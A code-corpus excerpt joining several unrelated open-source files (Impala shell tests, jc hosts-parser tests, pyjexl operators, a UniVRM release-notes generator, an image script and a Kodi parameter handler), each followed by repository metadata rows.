# limitations under the License.
import os
import pytest
import re
import shlex
import signal
from impala_shell_results import get_shell_cmd_result
from subprocess import Popen, PIPE, call
from tests.common.impala_service import ImpaladService
from time import sleep
from test_shell_common import assert_var_substitution
IMPALAD_HOST_PORT_LIST = pytest.config.option.impalad.split(',')
assert len(IMPALAD_HOST_PORT_LIST) > 0, 'Must specify at least 1 impalad to target'
IMPALAD = IMPALAD_HOST_PORT_LIST[0]
SHELL_CMD = "%s/bin/impala-shell.sh -i %s" % (os.environ['IMPALA_HOME'], IMPALAD)
DEFAULT_QUERY = 'select 1'
TEST_DB = "tmp_shell"
TEST_TBL = "tbl1"
QUERY_FILE_PATH = os.path.join(os.environ['IMPALA_HOME'], 'tests', 'shell')
class TestImpalaShell(object):
"""A set of sanity tests for the Impala shell commandline parameters.
  The tests need to maintain Python 2.4 compatibility, since a sub-goal of having
  shell tests is to ensure that the shell is not broken on systems running Python 2.4.
The tests need a running impalad instance in order to execute queries.
TODO:
* Test individual modules.
* Add a test for a kerberized impala.
"""
@classmethod
def setup_class(cls):
cls.__create_shell_data()
@classmethod
def teardown_class(cls):
run_impala_shell_cmd('-q "drop table if exists %s.%s"' % (TEST_DB, TEST_TBL))
run_impala_shell_cmd('-q "drop database if exists %s"' % TEST_DB)
@classmethod
def __create_shell_data(cls):
# Create a temporary table and populate it with test data.
stmts = ['create database if not exists %s' % TEST_DB,
'create table if not exists %s.%s (i integer, s string)' % (TEST_DB,
TEST_TBL),
"insert into %s.%s values (1, 'a'),(1, 'b'),(3, 'b')" % (TEST_DB, TEST_TBL)
]
args = '-q "%s"' % (';'.join(stmts))
run_impala_shell_cmd(args)
@pytest.mark.execute_serially
def test_no_args(self):
args = '-q "%s"' % DEFAULT_QUERY
run_impala_shell_cmd(args)
@pytest.mark.execute_serially
def test_multiple_queries(self):
queries = ';'.join([DEFAULT_QUERY] * 3)
args = '-q "%s" -B' % queries
run_impala_shell_cmd(args)
@pytest.mark.execute_serially
def test_multiple_queries_with_escaped_backslash(self):
# Regression test for string containing an escaped backslash. This relies on the
# patch at thirdparty/patches/sqlparse/0001-....patch.
run_impala_shell_cmd(r'''-q "select '\\\\'; select '\\'';" -B''')
@pytest.mark.execute_serially
def test_default_db(self):
args = '-d %s -q "describe %s" --quiet' % (TEST_DB, TEST_TBL)
run_impala_shell_cmd(args)
args = '-q "describe %s"' % TEST_TBL
run_impala_shell_cmd(args, expect_success=False)
# test keyword parquet is interpreted as an identifier
# when passed as an argument to -d
args = '-d parquet'
result = run_impala_shell_cmd(args)
assert "Query: use `parquet`" in result.stderr, result.stderr
# test if backticking is idempotent
args = "-d '```parquet```'"
result = run_impala_shell_cmd(args)
assert "Query: use `parquet`" in result.stderr, result.stderr
@pytest.mark.execute_serially
def test_refresh_on_connect(self):
args = '-r -q "%s"' % DEFAULT_QUERY
result = run_impala_shell_cmd(args)
assert 'Invalidating Metadata' in result.stderr, result.stderr
@pytest.mark.execute_serially
def test_unsecure_message(self):
results = run_impala_shell_cmd("")
assert "Starting Impala Shell without Kerberos authentication" in results.stderr
@pytest.mark.execute_serially
def test_print_header(self):
args = '--print_header -B --output_delim="," -q "select * from %s.%s"' % (TEST_DB,
TEST_TBL)
result = run_impala_shell_cmd(args)
result_rows = result.stdout.strip().split('\n')
assert len(result_rows) == 4
assert result_rows[0].split(',') == ['i', 's']
args = '-B --output_delim="," -q "select * from %s.%s"' % (TEST_DB, TEST_TBL)
result = run_impala_shell_cmd(args)
result_rows = result.stdout.strip().split('\n')
assert len(result_rows) == 3
@pytest.mark.execute_serially
def test_kerberos_option(self):
args = "-k"
# If you have a valid kerberos ticket in your cache, this test fails - so
# here we set a bogus KRB5CCNAME in the environment so that klist (and other
# kerberos commands) won't find the normal ticket cache.
# KERBEROS TODO: add kerberized cluster test case
os.environ["KRB5CCNAME"] = "/tmp/this/file/hopefully/does/not/exist"
# The command will fail because we're trying to connect to a kerberized impalad.
results = run_impala_shell_cmd(args, expect_success=False)
# Check that impala is using the right service name.
assert "Using service name 'impala'" in results.stderr
assert "Starting Impala Shell using Kerberos authentication" in results.stderr
# Check that Impala warns the user if klist does not exist on the system, or if
# no kerberos tickets are initialized.
try:
call(["klist"])
expected_error_msg = ("-k requires a valid kerberos ticket but no valid kerberos "
"ticket found.")
assert expected_error_msg in results.stderr
except OSError:
assert 'klist not found on the system' in results.stderr
# Make sure we don't try to re-connect
assert "retrying the connection with a secure transport" not in results.stderr
# Change the service name
args += " -s foobar"
results = run_impala_shell_cmd(args, expect_success=False)
assert "Using service name 'foobar'" in results.stderr
@pytest.mark.execute_serially
def test_continue_on_error(self):
args = '-c -q "select foo; select bar;"'
run_impala_shell_cmd(args)
# Should fail
args = '-q "select foo; select bar;"'
run_impala_shell_cmd(args, expect_success=False)
@pytest.mark.execute_serially
def test_execute_queries_from_file(self):
args = '-f %s/test_file_comments.sql --quiet -B' % QUERY_FILE_PATH
result = run_impala_shell_cmd(args)
output = result.stdout
args = '-f %s/test_file_no_comments.sql --quiet -B' % QUERY_FILE_PATH
result = run_impala_shell_cmd(args)
assert output == result.stdout, "Queries with comments not parsed correctly"
@pytest.mark.execute_serially
def test_completed_query_errors(self):
args = ('-q "set abort_on_error=false;'
' select count(*) from functional_seq_snap.bad_seq_snap"')
result = run_impala_shell_cmd(args)
assert 'WARNINGS:' in result.stderr
assert 'Bad synchronization marker' in result.stderr
assert 'Expected: ' in result.stderr
assert 'Actual: ' in result.stderr
assert 'Problem parsing file' in result.stderr
# Regression test for CDH-21036
# do not print warning log in quiet mode
args = ('-q "set abort_on_error=false;'
' select count(*) from functional_seq_snap.bad_seq_snap" --quiet')
result = run_impala_shell_cmd(args)
assert 'WARNINGS:' not in result.stderr
@pytest.mark.execute_serially
def test_output_format(self):
expected_output = ['1'] * 3
args = '-q "select 1,1,1" -B --quiet'
result = run_impala_shell_cmd(args)
actual_output = [r.strip() for r in result.stdout.split('\t')]
assert actual_output == expected_output
result = run_impala_shell_cmd(args + ' --output_delim="|"')
actual_output = [r.strip() for r in result.stdout.split('|')]
assert actual_output == expected_output
result = run_impala_shell_cmd(args + ' --output_delim="||"',
expect_success=False)
assert "Illegal delimiter" in result.stderr
@pytest.mark.execute_serially
def test_do_methods(self):
"""Ensure that the do_ methods in the shell work.
Some of the do_ methods are implicitly tested in other tests, and as part of the test
setup.
"""
# explain
args = '-q "explain select 1"'
run_impala_shell_cmd(args)
# show
args = '-q "show tables"'
run_impala_shell_cmd(args)
# with
args = '-q "with t1 as (select 1) select * from t1"'
run_impala_shell_cmd(args)
# set
# spaces around the = sign
args = '-q "set default_order_by_limit = 10"'
run_impala_shell_cmd(args)
# no spaces around the = sign
args = '-q "set default_order_by_limit=10"'
run_impala_shell_cmd(args)
# test query options displayed
args = '-q "set"'
result_set = run_impala_shell_cmd(args)
assert 'MEM_LIMIT: [0]' in result_set.stdout
# test to check that explain_level is 1
assert 'EXPLAIN_LEVEL: [1]' in result_set.stdout
# test values displayed after setting value
args = '-q "set mem_limit=1g;set"'
result_set = run_impala_shell_cmd(args)
# single list means one instance of mem_limit in displayed output
assert 'MEM_LIMIT: 1g' in result_set.stdout
assert 'MEM_LIMIT: [0]' not in result_set.stdout
# Negative tests for set
# use : instead of =
args = '-q "set default_order_by_limit:10"'
run_impala_shell_cmd(args, expect_success=False)
# use 2 = signs
args = '-q "set default_order_by_limit=10=50"'
run_impala_shell_cmd(args, expect_success=False)
# describe and desc should return the same result.
args = '-q "describe %s.%s" -B' % (TEST_DB, TEST_TBL)
result_describe = run_impala_shell_cmd(args)
args = '-q "desc %s.%s" -B' % (TEST_DB, TEST_TBL)
result_desc = run_impala_shell_cmd(args)
assert result_describe.stdout == result_desc.stdout
@pytest.mark.execute_serially
def test_runtime_profile(self):
# test summary is in both the profile printed by the
# -p option and the one printed by the profile command
args = "-p -q 'select 1; profile;'"
result_set = run_impala_shell_cmd(args)
# This regex helps us uniquely identify a profile.
regex = re.compile("Operator\s+#Hosts\s+Avg\s+Time")
# We expect two query profiles.
assert len(re.findall(regex, result_set.stdout)) == 2, \
"Could not detect two profiles, stdout: %s" % result_set.stdout
@pytest.mark.execute_serially
def test_summary(self):
args = "-q 'select count(*) from functional.alltypes; summary;'"
result_set = run_impala_shell_cmd(args)
assert "03:AGGREGATE" in result_set.stdout
args = "-q 'summary;'"
result_set = run_impala_shell_cmd(args, expect_success=False)
assert "Could not retrieve summary for query" in result_set.stderr
args = "-q 'show tables; summary;'"
result_set = run_impala_shell_cmd(args)
assert "Summary not available" in result_set.stderr
# Test queries without an exchange
args = "-q 'select 1; summary;'"
result_set = run_impala_shell_cmd(args)
assert "00:UNION" in result_set.stdout
@pytest.mark.execute_serially
def test_queries_closed(self):
"""Regression test for IMPALA-897"""
args = '-f %s/test_close_queries.sql --quiet -B' % QUERY_FILE_PATH
cmd = "%s %s" % (SHELL_CMD, args)
# Execute the shell command async
p = Popen(shlex.split(cmd), shell=False, stdout=PIPE, stderr=PIPE)
impalad_service = ImpaladService(IMPALAD.split(':')[0])
# The last query in the test SQL script will sleep for 10 seconds, so sleep
# here for 5 seconds and verify the number of in-flight queries is 1.
sleep(5)
assert 1 == impalad_service.get_num_in_flight_queries()
assert get_shell_cmd_result(p).rc == 0
assert 0 == impalad_service.get_num_in_flight_queries()
@pytest.mark.execute_serially
def test_cancellation(self):
"""Test cancellation (Ctrl+C event)"""
args = '-q "select sleep(10000)"'
cmd = "%s %s" % (SHELL_CMD, args)
p = Popen(shlex.split(cmd), stderr=PIPE, stdout=PIPE)
sleep(3)
os.kill(p.pid, signal.SIGINT)
result = get_shell_cmd_result(p)
assert "Cancelling Query" in result.stderr, result.stderr
@pytest.mark.execute_serially
def test_get_log_once(self):
"""Test that get_log() is always called exactly once."""
pytest.xfail(reason="The shell doesn't fetch all the warning logs.")
# Query with fetch
args = '-q "select * from functional.alltypeserror"'
result = run_impala_shell_cmd(args)
assert result.stderr.count('WARNINGS') == 1
# Insert query (doesn't fetch)
INSERT_TBL = "alltypes_get_log"
DROP_ARGS = '-q "drop table if exists %s.%s"' % (TEST_DB, INSERT_TBL)
run_impala_shell_cmd(DROP_ARGS)
args = '-q "create table %s.%s like functional.alltypeserror"' % (TEST_DB, INSERT_TBL)
run_impala_shell_cmd(args)
args = '-q "insert overwrite %s.%s partition(year, month)' \
'select * from functional.alltypeserror"' % (TEST_DB, INSERT_TBL)
result = run_impala_shell_cmd(args)
assert result.stderr.count('WARNINGS') == 1
run_impala_shell_cmd(DROP_ARGS)
@pytest.mark.execute_serially
def test_international_characters(self):
"""Sanity test to ensure that the shell can read international characters."""
RUSSIAN_CHARS = (u"А, Б, В, Г, Д, Е, Ё, Ж, З, И, Й, К, Л, М, Н, О, П, Р,"
u"С, Т, У, Ф, Х, Ц,Ч, Ш, Щ, Ъ, Ы, Ь, Э, Ю, Я")
args = """-B -q "select '%s'" """ % RUSSIAN_CHARS
result = run_impala_shell_cmd(args.encode('utf-8'))
assert 'UnicodeDecodeError' not in result.stderr
#print result.stdout.encode('utf-8')
assert RUSSIAN_CHARS.encode('utf-8') in result.stdout
@pytest.mark.execute_serially
def test_config_file(self):
"""Test the optional configuration file"""
# Positive tests
args = '--config_file=%s/good_impalarc' % QUERY_FILE_PATH
result = run_impala_shell_cmd(args)
assert 'Query: select 1' in result.stderr
assert 'Invalidating Metadata' in result.stderr
# override option in config file through command line
args = '--config_file=%s/good_impalarc --query="select 2"' % QUERY_FILE_PATH
result = run_impala_shell_cmd(args)
assert 'Query: select 2' in result.stderr
# Negative Tests
# specified config file does not exist
args = '--config_file=%s/does_not_exist' % QUERY_FILE_PATH
run_impala_shell_cmd(args, expect_success=False)
# bad formatting of config file
args = '--config_file=%s/bad_impalarc' % QUERY_FILE_PATH
run_impala_shell_cmd(args, expect_success=False)
@pytest.mark.execute_serially
def test_execute_queries_from_stdin(self):
""" Test that queries get executed correctly when STDIN is given as the sql file """
args = '-f - --quiet -B'
query_file = "%s/test_file_comments.sql" % QUERY_FILE_PATH
query_file_handle = None
try:
query_file_handle = open(query_file, 'r')
query = query_file_handle.read()
query_file_handle.close()
except Exception, e:
assert query_file_handle != None, "Exception %s: Could not find query file" % e
result = run_impala_shell_cmd(args, expect_success=True, stdin_input=query)
output = result.stdout
args = '-f %s/test_file_no_comments.sql --quiet -B' % QUERY_FILE_PATH
result = run_impala_shell_cmd(args)
assert output == result.stdout, "Queries from STDIN not parsed correctly."
@pytest.mark.execute_serially
def test_allow_creds_in_clear(self):
args = '-l'
result = run_impala_shell_cmd(args, expect_success=False)
assert "LDAP credentials may not be sent over insecure connections. " +\
"Enable SSL or set --auth_creds_ok_in_clear" in result.stderr
# TODO: Without an Impala daemon running LDAP authentication, we can't test if
# --auth_creds_ok_in_clear works when correctly set.
@pytest.mark.execute_serially
def test_ldap_password_from_shell(self):
args = "-l --auth_creds_ok_in_clear --ldap_password_cmd='%s'"
result = run_impala_shell_cmd(args % 'cmddoesntexist', expect_success=False)
assert ("Error retrieving LDAP password (command was: 'cmddoesntexist', exception "
"was: '[Errno 2] No such file or directory')") in result.stderr
result = run_impala_shell_cmd(args % 'cat filedoesntexist', expect_success=False)
assert ("Error retrieving LDAP password (command was 'cat filedoesntexist', error "
"was: 'cat: filedoesntexist: No such file or directory')") in result.stderr
# TODO: Without an Impala daemon with LDAP authentication enabled, we can't test the
# positive case where the password is correct.
@pytest.mark.execute_serially
def test_var_substitution(self):
args = '--var=foo=123 --var=BAR=456 --delimited --output_delimiter=" " -c -f %s' \
% (os.path.join(QUERY_FILE_PATH, 'test_var_substitution.sql'))
result = run_impala_shell_cmd(args, expect_success=True)
assert_var_substitution(result)
def run_impala_shell_cmd(shell_args, expect_success=True, stdin_input=None):
"""Runs the Impala shell on the commandline.
'shell_args' is a string which represents the commandline options.
Returns a ImpalaShellResult.
"""
cmd = "%s %s" % (SHELL_CMD, shell_args)
p = Popen(shlex.split(cmd), shell=False, stdout=PIPE, stderr=PIPE, stdin=PIPE)
result = get_shell_cmd_result(p, stdin_input)
if expect_success:
assert result.rc == 0, "Cmd %s was expected to succeed: %s" % (cmd, result.stderr)
else:
assert result.rc != 0, "Cmd %s was expected to fail" % cmd
return result
| 41.395833 | 90 | 0.695297 |
3199c9639bbd6aac6e9ff188b9f712c6679153ae | 1,334 | py | Python | tests/test_hosts.py | philippeitis/jc | d96b3a65a98bc135d21d4feafc0a43317b5a11fa | [
"MIT"
] | null | null | null | tests/test_hosts.py | philippeitis/jc | d96b3a65a98bc135d21d4feafc0a43317b5a11fa | [
"MIT"
] | null | null | null | tests/test_hosts.py | philippeitis/jc | d96b3a65a98bc135d21d4feafc0a43317b5a11fa | [
"MIT"
] | null | null | null | import os
import json
import unittest
import jc.parsers.hosts
THIS_DIR = os.path.dirname(os.path.abspath(__file__))
class MyTests(unittest.TestCase):
def setUp(self):
# input
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/hosts.out'), 'r') as f:
self.centos_7_7_hosts = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/hosts.out'), 'r') as f:
self.ubuntu_18_4_hosts = f.read()
# output
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/hosts.json'), 'r') as f:
self.centos_7_7_hosts_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/hosts.json'), 'r') as f:
self.ubuntu_18_4_hosts_json = json.loads(f.read())
def test_hosts_centos_7_7(self):
"""
Test 'cat /etc/hosts' on Centos 7.7
"""
self.assertEqual(jc.parsers.hosts.parse(self.centos_7_7_hosts, quiet=True), self.centos_7_7_hosts_json)
def test_hosts_ubuntu_18_4(self):
"""
Test 'cat /etc/hosts' on Ubuntu 18.4
"""
self.assertEqual(jc.parsers.hosts.parse(self.ubuntu_18_4_hosts, quiet=True), self.ubuntu_18_4_hosts_json)
if __name__ == '__main__':
unittest.main()
| 32.536585 | 113 | 0.648426 |
fea655d2a46fa8b926d9958ee82f644925010fca | 1,153 | py | Python | pyjexl/operators.py | Mozilla-GitHub-Standards/cdc4ff6c2ab805b1af7644e7bb46e234f75ed6f45092a5954bb0a727eaaa7b34 | efba20f8a2f8a000af963c6b92046ed3bcbaae79 | [
"MIT"
] | 8 | 2016-08-28T03:47:58.000Z | 2021-07-03T18:44:49.000Z | pyjexl/operators.py | Mozilla-GitHub-Standards/cdc4ff6c2ab805b1af7644e7bb46e234f75ed6f45092a5954bb0a727eaaa7b34 | efba20f8a2f8a000af963c6b92046ed3bcbaae79 | [
"MIT"
] | 9 | 2016-07-31T07:19:01.000Z | 2018-03-21T21:17:04.000Z | pyjexl/operators.py | Mozilla-GitHub-Standards/cdc4ff6c2ab805b1af7644e7bb46e234f75ed6f45092a5954bb0a727eaaa7b34 | efba20f8a2f8a000af963c6b92046ed3bcbaae79 | [
"MIT"
] | 4 | 2016-08-19T18:09:48.000Z | 2020-04-24T14:32:20.000Z | import operator
class Operator(object):
__slots__ = ('symbol', 'precedence', 'evaluate')
def __init__(self, symbol, precedence, evaluate):
self.symbol = symbol
self.precedence = precedence
self.evaluate = evaluate
def __repr__(self):
return 'Operator({})'.format(repr(self.symbol))
default_binary_operators = {
'+': Operator('+', 30, operator.add),
'-': Operator('-', 30, operator.sub),
'*': Operator('*', 40, operator.mul),
'//': Operator('//', 40, operator.floordiv),
'/': Operator('/', 40, operator.truediv),
'%': Operator('%', 50, operator.mod),
'^': Operator('^', 50, operator.pow),
'==': Operator('==', 20, operator.eq),
'!=': Operator('!=', 20, operator.ne),
'>=': Operator('>=', 20, operator.ge),
'>': Operator('>', 20, operator.gt),
'<=': Operator('<=', 20, operator.le),
'<': Operator('<', 20, operator.lt),
'&&': Operator('&&', 10, lambda a, b: a and b),
'||': Operator('||', 10, lambda a, b: a or b),
'in': Operator('in', 20, lambda a, b: a in b),
}
default_unary_operators = {
'!': Operator('!', 1000, operator.not_),
}
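# A quick illustration (not part of pyjexl's public API): expression nodes can
# be evaluated by looking operators up by symbol in the tables above.
if __name__ == '__main__':
    plus = default_binary_operators['+']
    assert plus.evaluate(2, 3) == 5          # "2 + 3"
    bang = default_unary_operators['!']
    assert bang.evaluate(False) is True      # "!false"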
| 29.564103 | 55 | 0.548135 |
5fa476cc5b8135cd83a194f376504191a219ff62 | 3,106 | py | Python | docs/release_gen.py | StrawberryLovah/UniVRM | 4ae9b94e89ede7d1eb481801e356f3491b813629 | [
"MIT"
] | 1,128 | 2019-04-24T01:11:52.000Z | 2022-03-31T02:09:04.000Z | docs/release_gen.py | StrawberryLovah/UniVRM | 4ae9b94e89ede7d1eb481801e356f3491b813629 | [
"MIT"
] | 688 | 2019-04-24T06:38:18.000Z | 2022-03-30T04:19:57.000Z | docs/release_gen.py | StrawberryLovah/UniVRM | 4ae9b94e89ede7d1eb481801e356f3491b813629 | [
"MIT"
] | 232 | 2019-04-23T19:08:25.000Z | 2022-03-29T11:40:33.000Z | #
# Script to generate the markdown for a GitHub Release
#
import pathlib
import re
import subprocess
HERE = pathlib.Path(__file__).absolute().parent
UNIVRM_VERSION = HERE.parent / 'Assets/VRM/Runtime/Format/VRMVersion.cs'
def gen(version: str, hash: str):
version_hash = f'{version}_{hash[0:4]}'
print(f'''
# Download
* for `Unity-2019.4.LTS` or later
* [UniVRM-{version_hash}.unitypackage](https://github.com/vrm-c/UniVRM/releases/download/v{version}/UniVRM-{version_hash}.unitypackage)
> `v0.87.0` から UniGLTF_VRMShaders と UniVRM が合体してひとつになりました。
> From `v0.87.0`, UniGLTF_VRMShaders and UniVRM have been merged into one.
ReleaseNote
* [日本語](https://vrm-c.github.io/UniVRM/ja/release/079/v{version}.html)
* [English](https://vrm-c.github.io/UniVRM/en/release/079/v{version}.html)
## other unitypackage
### UniVRM API sample
* [UniVRM_Samples-{version_hash}.unitypackage](https://github.com/vrm-c/UniVRM/releases/download/v{version}/UniVRM_Samples-{version_hash}.unitypackage)
### VRM-1.0Beta
* [VRM-{version_hash}.unitypackage](https://github.com/vrm-c/UniVRM/releases/download/v{version}/VRM-{version_hash}.unitypackage)
### VRM-1.0Beta API sample
* [VRM_Samples-{version_hash}.unitypackage](https://github.com/vrm-c/UniVRM/releases/download/v{version}/VRM_Samples-{version_hash}.unitypackage)
|package|folder|
|-|-|
|UniVRM|Assets/VRMShaders, Assets/UniGLTF, Assets/VRM|
|UniVRM_Samples|Assets/VRM_Samples|
|VRM|Assets/VRMShaders, Assets/UniGLTF, Assets/VRM10|
|VRM_Samples|Assets/VRM10_Samples|
# UPM
| UPM package | rename | UPM url |
|---------------------|------------------|------------------------------------------------------------------------|
| com.vrmc.vrmshaders | | https://github.com/vrm-c/UniVRM.git?path=/Assets/VRMShaders#v{version} |
| com.vrmc.gltf | com.vrmc.unigltf | https://github.com/vrm-c/UniVRM.git?path=/Assets/UniGLTF#v{version} |
| com.vrmc.univrm | | https://github.com/vrm-c/UniVRM.git?path=/Assets/VRM#v{version} |
| com.vrmc.vrm | com.vrmc.univrm1 | https://github.com/vrm-c/UniVRM.git?path=/Assets/VRM10#v{version} |
```json
// manifest.json
{{
"dependencies": {{
///
"com.vrmc.vrmshaders": "https://github.com/vrm-c/UniVRM.git?path=/Assets/VRMShaders#v{version}",
"com.vrmc.gltf": "https://github.com/vrm-c/UniVRM.git?path=/Assets/UniGLTF#v{version}",
"com.vrmc.univrm": "https://github.com/vrm-c/UniVRM.git?path=/Assets/VRM#v{version}",
"com.vrmc.vrm": "https://github.com/vrm-c/UniVRM.git?path=/Assets/VRM10#v{version}",
///
}}
}}
```
''')
def get_version() -> str:
m = re.search(r'public const string VERSION = "(\d.\d+.\d)";',
UNIVRM_VERSION.read_text(encoding='utf-8'))
if m:
return m[1]
raise Exception("no version")
def get_hash() -> str:
    res = subprocess.check_output(['git', 'rev-parse', 'HEAD'])
    return res.decode('utf-8').strip()
if __name__ == '__main__':
    version = get_version()
hash = get_hash()
gen(version, hash)
| 36.541176 | 151 | 0.645203 |
ac5effb9b3c269de03d861a49d152f95fc6a1274 | 6,498 | py | Python | kubernetes_asyncio/client/models/v1alpha1_subject.py | olitheolix/kubernetes_asyncio | 344426793e4e4b653bcd8e4a29c6fa4766e1fff7 | [
"Apache-2.0"
] | 1 | 2020-03-25T01:24:27.000Z | 2020-03-25T01:24:27.000Z | kubernetes_asyncio/client/models/v1alpha1_subject.py | olitheolix/kubernetes_asyncio | 344426793e4e4b653bcd8e4a29c6fa4766e1fff7 | [
"Apache-2.0"
] | null | null | null | kubernetes_asyncio/client/models/v1alpha1_subject.py | olitheolix/kubernetes_asyncio | 344426793e4e4b653bcd8e4a29c6fa4766e1fff7 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: v1.10.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class V1alpha1Subject(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'api_version': 'str',
'kind': 'str',
'name': 'str',
'namespace': 'str'
}
attribute_map = {
'api_version': 'apiVersion',
'kind': 'kind',
'name': 'name',
'namespace': 'namespace'
}
def __init__(self, api_version=None, kind=None, name=None, namespace=None): # noqa: E501
"""V1alpha1Subject - a model defined in Swagger""" # noqa: E501
self._api_version = None
self._kind = None
self._name = None
self._namespace = None
self.discriminator = None
if api_version is not None:
self.api_version = api_version
self.kind = kind
self.name = name
if namespace is not None:
self.namespace = namespace
@property
def api_version(self):
"""Gets the api_version of this V1alpha1Subject. # noqa: E501
APIVersion holds the API group and version of the referenced subject. Defaults to \"v1\" for ServiceAccount subjects. Defaults to \"rbac.authorization.k8s.io/v1alpha1\" for User and Group subjects. # noqa: E501
:return: The api_version of this V1alpha1Subject. # noqa: E501
:rtype: str
"""
return self._api_version
@api_version.setter
def api_version(self, api_version):
"""Sets the api_version of this V1alpha1Subject.
APIVersion holds the API group and version of the referenced subject. Defaults to \"v1\" for ServiceAccount subjects. Defaults to \"rbac.authorization.k8s.io/v1alpha1\" for User and Group subjects. # noqa: E501
:param api_version: The api_version of this V1alpha1Subject. # noqa: E501
:type: str
"""
self._api_version = api_version
@property
def kind(self):
"""Gets the kind of this V1alpha1Subject. # noqa: E501
        Kind of object being referenced. Values defined by this API group are \"User\", \"Group\", and \"ServiceAccount\". If the Authorizer does not recognize the kind value, the Authorizer should report an error. # noqa: E501
:return: The kind of this V1alpha1Subject. # noqa: E501
:rtype: str
"""
return self._kind
@kind.setter
def kind(self, kind):
"""Sets the kind of this V1alpha1Subject.
        Kind of object being referenced. Values defined by this API group are \"User\", \"Group\", and \"ServiceAccount\". If the Authorizer does not recognize the kind value, the Authorizer should report an error. # noqa: E501
:param kind: The kind of this V1alpha1Subject. # noqa: E501
:type: str
"""
if kind is None:
raise ValueError("Invalid value for `kind`, must not be `None`") # noqa: E501
self._kind = kind
@property
def name(self):
"""Gets the name of this V1alpha1Subject. # noqa: E501
Name of the object being referenced. # noqa: E501
:return: The name of this V1alpha1Subject. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this V1alpha1Subject.
Name of the object being referenced. # noqa: E501
:param name: The name of this V1alpha1Subject. # noqa: E501
:type: str
"""
if name is None:
raise ValueError("Invalid value for `name`, must not be `None`") # noqa: E501
self._name = name
@property
def namespace(self):
"""Gets the namespace of this V1alpha1Subject. # noqa: E501
Namespace of the referenced object. If the object kind is non-namespace, such as \"User\" or \"Group\", and this value is not empty the Authorizer should report an error. # noqa: E501
:return: The namespace of this V1alpha1Subject. # noqa: E501
:rtype: str
"""
return self._namespace
@namespace.setter
def namespace(self, namespace):
"""Sets the namespace of this V1alpha1Subject.
Namespace of the referenced object. If the object kind is non-namespace, such as \"User\" or \"Group\", and this value is not empty the Authorizer should report an error. # noqa: E501
:param namespace: The namespace of this V1alpha1Subject. # noqa: E501
:type: str
"""
self._namespace = namespace
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1alpha1Subject):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
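# Usage sketch (not part of the generated client); the field values below are
# illustrative only.
if __name__ == '__main__':
    subject = V1alpha1Subject(kind='ServiceAccount', name='deployer', namespace='ci')
    print(subject.to_dict())
    # {'api_version': None, 'kind': 'ServiceAccount', 'name': 'deployer', 'namespace': 'ci'}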
| 32.328358 | 229 | 0.599107 |
6099254145e6a2a471210d1793d88c732123b558 | 908 | py | Python | Other files (test scripts etc.)/Project_1.py | dg1223/InsectRecognition-UniversityOfGuelph_SemiosBio-Project | 597ae45e04895984669b001129871ebed1a3178c | [
"MIT"
] | 2 | 2015-10-18T04:30:22.000Z | 2017-01-03T15:24:27.000Z | Other files (test scripts etc.)/Project_1.py | dg1223/InsectRecognition-UniversityOfGuelph_SemiosBio-Project | 597ae45e04895984669b001129871ebed1a3178c | [
"MIT"
] | null | null | null | Other files (test scripts etc.)/Project_1.py | dg1223/InsectRecognition-UniversityOfGuelph_SemiosBio-Project | 597ae45e04895984669b001129871ebed1a3178c | [
"MIT"
] | null | null | null | ## This script is modelled to run in IPython
import numpy as np
import matplotlib.pylab as plt
import PIL
import Image
import ImageOps as io
import scipy
from scipy import ndimage
import _imaging
import glob
import json
from pprint import pprint
### Perform contrast normalization on all the images if necessary
### Needs to be made into a function that takes: file path name, format name, cutoff, target path, fmt
##
##cd 'your file path name here'
##
##list_of_files = glob.glob('*.formatname')
##list_of_files = np.array(list_of_files)
##
##for x in range(np.shape(list_of_files)[0]):
## image = Image.open(list_of_files[x])
##    image = io.autocontrast(image, cutoff=0.1) # or any other cutoff percentage
## image.save('targetpath/' + list_of_files[x], 'fmt') # fmt = JPEG, PNG etc
# go to working directory
cd '/mnt/data/shamir/Annotation data set/Normalized Images/Good Images/Postive Counts/Training Set'
| 27.515152 | 99 | 0.741189 |
45321ba39832c61ca2df3ed63db239ac74187c45 | 788 | py | Python | plugin.video.vstream/resources/lib/handler/inputParameterHandler.py | akuala/REPO.KUALA | ea9a157025530d2ce8fa0d88431c46c5352e89d4 | [
"Apache-2.0"
] | 2 | 2018-11-02T19:55:30.000Z | 2020-08-14T02:22:20.000Z | plugin.video.vstream/resources/lib/handler/inputParameterHandler.py | akuala/REPO.KUALA | ea9a157025530d2ce8fa0d88431c46c5352e89d4 | [
"Apache-2.0"
] | null | null | null | plugin.video.vstream/resources/lib/handler/inputParameterHandler.py | akuala/REPO.KUALA | ea9a157025530d2ce8fa0d88431c46c5352e89d4 | [
"Apache-2.0"
] | 3 | 2019-12-17T20:47:00.000Z | 2021-02-11T19:03:59.000Z | import urllib
import sys
class cInputParameterHandler:
def __init__(self):
aParams = dict()
        if len(sys.argv) >= 3 and len(sys.argv[2]) > 0:
aParams = dict(part.split('=') for part in sys.argv[2][1:].split('&'))
self.__aParams = aParams
